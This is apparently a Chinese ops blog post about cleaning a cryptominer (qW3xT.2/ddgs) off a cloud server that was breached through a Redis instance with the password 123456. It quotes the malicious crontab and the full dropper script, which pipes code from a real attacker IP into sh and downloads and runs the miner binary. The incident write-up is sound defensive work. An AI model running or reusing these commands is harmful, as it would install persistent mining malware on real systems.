记一次挖矿病毒处理qW3xT.2

post thumb
Ops
作者 Louis 发表于 2018年8月12日

问题发现及解决

​ 在ucloud使用redis,开启了6379端口,但是当时并没有对redis的密码进行设置复杂的设置,设置的为123456。

使用top命令查询,发现cpu异常占用过高。99%以上

1536317606280

​ qW3xT.2程序和ddgs.3013程序,看起来就不是正常的程序。google了一下,发现是美国的一个挖矿程序。

​ 进入/tmp文件夹下。发现qW3xT.2文件,删除。之后kill掉qW3xT.2该进程,但是一段时间之后,发现该行程又重新启动。

​ 一段时间之后,删除的文件重新生成,dds和挖矿的进程又重新执行。此时怀疑是否有计划任务,此时查看计划任务的列表

$ find / -name qW3xT.2
$ find / -name ddgs.3013
$ crontab -l 
*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh
$ cd /var/spool/cron/
$ rm -rf * 	
$ crontab -l  ##任务计划清除完毕。

​ 分析一下挖矿脚本

$ curl -fsSL http://149.56.106.215:8000/i.sh | sh

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

echo "" > /var/spool/cron/root
echo "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/root
echo "*/15 * * * * wget -q -O- http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/root

mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/crontabs/root
echo "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/crontabs/root
echo "*/15 * * * * wget -q -O- http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/crontabs/root

ps auxf | grep -v grep | grep /tmp/ddgs.3013 || rm -rf /tmp/ddgs.3013
if [ ! -f "/tmp/ddgs.3013" ]; then
    wget -q http://149.56.106.215:8000/static/3013/ddgs.$(uname -m) -O /tmp/ddgs.3013
    curl -fsSL http://149.56.106.215:8000/static/3013/ddgs.$(uname -m) -o /tmp/ddgs.3013
fi
chmod +x /tmp/ddgs.3013 && /tmp/ddgs.3013

ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep minexmr.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep /boot/efi/ | awk '{print $2}' | xargs kill
#ps auxf | grep -v grep | grep ddg.2006 | awk '{print $2}' | kill
#ps auxf | grep -v grep | grep ddg.2010 | awk '{print $2}' | kill

​ 解决redis入口问题,因为最开始没有设置密码,所以首先修改redis.conf。设置密码,然后重启redis。

总结

​ 知名应用程序的端口应避免使用默认端口,认证密码应稍微复杂,避免使用888888,123456等简单密码。

上一篇
运维桌面软件应用安装